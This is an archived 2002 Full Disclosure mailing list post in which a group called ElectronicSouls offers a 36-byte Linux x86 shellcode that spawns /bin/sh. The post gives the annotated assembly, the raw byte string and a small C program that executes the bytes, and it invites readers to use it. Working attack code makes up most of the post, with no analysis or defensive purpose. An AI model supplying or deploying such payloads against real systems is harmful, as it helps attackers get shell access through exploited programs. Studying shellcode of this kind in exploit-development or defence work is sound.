Full Disclosure mailing list archives
[ElectronicSouls] - More shellcodes!@#
From: es () hush com
Date: Fri, 29 Nov 2002 09:37:25 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, Here is yet another piece of shellcode you might like to use. :> # cat linux-execve.c /* (C) Steele [ElectronicSouls] * * main: * jmp short get_string ; jmp to get string * * start_shell: * xor ebx, ebx ; zeroout ebx * xor ecx, ecx ; zeroout ecx * mul ecx ; and i thought i didn't like multiplication * * pop ebx ; load string /bin/sh * * mov al, 0x0b * mov [ebx+7], dl ; put a null at the end of /bin/sh * push edx ; argv[1] = NULL * push ebx ; argv[0] = filename => /bin/sh * mov ecx, esp ; yes all that goes to ecx * int 0x80 * * mov al, 0x1 ; exit * int 0x80 * * get_string: * call start_shell ; call start_shell with shell with us :) * shell db "/bin/sh" */ #define DID_YOU_KNOW "that this code executes /bin/sh"\ "this shellcode is 36 bytes " unsigned char shellcode[] = "\xeb\x16\x31\xdb\x31\xc9\xf7\xe1" "\x5b\xb0\x0b\x88\x53\x07\x52\x53" "\x89\xe1\xcd\x80\xb0\x01\xcd\x80" "\xe8\xe5\xff\xff\xff/bin/sh"; int main() { /* modified from lamagra's execute chroot shellcode */ int (*funct)(); funct = (int (*)()) shellcode; printf("size = %d\n",strlen(shellcode)); (int)(*funct)(); } # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "My mom is making me clean my bedroom." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3npegMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltS7QAn1QFjbJ08utl Jkfpggrt5/ZzUJq8AKCCFXZgmdrMCU04xKMSf7gmxfrb4A== =nfut -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - More shellcodes!@# es (Nov 29)